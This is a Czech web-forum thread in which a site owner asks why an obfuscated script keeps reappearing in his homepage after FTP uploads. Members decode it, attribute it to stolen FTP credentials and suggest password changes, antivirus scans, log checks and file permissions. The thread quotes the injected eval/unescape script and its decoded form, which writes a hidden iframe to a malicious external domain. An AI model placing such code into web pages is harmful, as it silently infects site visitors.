Autor Zpráva
jaseb
Profil
Přes ftp natáhnu stránky na web (mám to hosting na forpsi) a funguje to v pohodě, ale když to kontroluju třeba za 2 hod, tak se ve zdrojáku na úvodní stránce objevý skript: <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%4 4%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69 %66%72%61%6d%65%20%6e%61%6d%65%3d%37%64%66%39%30%35%20%73%72%63%3d%5c% 27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2 e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72 %61%6e%64%6f%6d%28%29%2a%33%31%39%32%30%29%2b%27%38%62%34%5c%27%20%77% 69%64%74%68%3d%33%33%36%20%68%65%69%67%68%74%3d%39%35%20%73%74%79%6c%6 5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66 %72%61%6d%65%3e%27%29")); </script>
a od tohoto okamžiku si to chce stáhnout něco z netu a ten soubor je zavirovanej. Když to smažu a uložim, tak to zas funguje v pohodě, ale za nějakej čas se to tam zase dostane. Netuší někdo co s tim dělat?
Měsíček
Profil
ne ani tak zavirovanej jak zašifrovanej funkcí " Escape()"
Joker
Profil
No nejspíš to tam někdo cpe. Je potřeba zjistit, jakým způsobem se to tam dostane.
Chamurappi
Profil
Reaguji na jaseba:
Máš vir, ten poslal tvé přihlašovací údaje k FTP zahraničnímu robotovi a ten každou hodinu upravuje kód všech tvých stránek, abys infekcí potěšil i své návštěvníky.
Měsíček
Profil
změň heslo a mělo by to býti v pohodě ;)
Bubák
Profil
Zajímavý script:
"window.status='Done';document.write('<iframe name=7df905 src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31920)+'8b4 ' width=336 height=95 style='display: none'></iframe>')"
peta
Profil
jaseb
<script>eval(unescape(".......")); </script>
v prvni rade jsi si mohl prozkoumat script, viz Bubák
<script>alert(unescape(".......")); </script>

Jako druhe bych sledoval odkud se to tam veme.
Na to bych mel par tipu:
viz Měsíček, zmenil bych si heslo na ftp, pro jistotu.
Ale to zrejme na dlouho nepomuze, protoze to vypada, ze to mas zavirovane ty nebo pouzivas na FTP takovy program, ktery ti to tam dava. Protoze pouzivas neregistrovanou verzi, treba. Take to muze byt problem hostingu.

Takze bych mozna zkusil jako treti odvirovat komp v nouzovem rezimu, jak na adware-spyware, tak mozna zkusit potom avg/nod32. Pokud to neudelas v nouzovem rezimu, tak jen ztracis cas.

Mozna by bylo dobre jeste napsat, jaky editor a jaky FTP program s jakymi licencemi pouzivas. Dalo by se mozna dohledat na google podle 'http://alltraff.ru' je to souvisi prave s temito programy a dela to i jinym lidem.

Google mi vyhodilo na tu web:
alltraff.ru/spl/index.php
Tyto stránky mohou poškodit váš počítač.
Podobné stránky
:)

google.com: alltraff.ru javascript
tady treba 1 forum o tom pojednava take:
http://www.webhostingtalk.com/showthread.php?p=4731997
- doporucuji si prostudovat logy, kde bude napsano, ktery script-program to tam dal. A pokud to tam neni, pak je to problem na danem serveru.
Dobre, ze jsi uvedl, ze se jedna o forpsi, mozna by to chtelo odkaz na stranku.
- take tam napriklad pisi o moznych chybach v bezpecnosti, napr. v programech: phpbb, wordpress, etc...

A zajimavy tip, ze bys mohl nastavit v danem adresari, souboru prava takova, aby jej neslo prepsat. Tedy, jestli umis nastavit linuxova prava.

Vaše odpověď

Mohlo by se hodit

Neumíte-li správně určit příčinu chyby, vkládejte odkazy na živé ukázky.
Užíváte-li nějakou cizí knihovnu, ukažte odpovídajícím, kde jste ji vzali.

Užitečné odkazy:

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: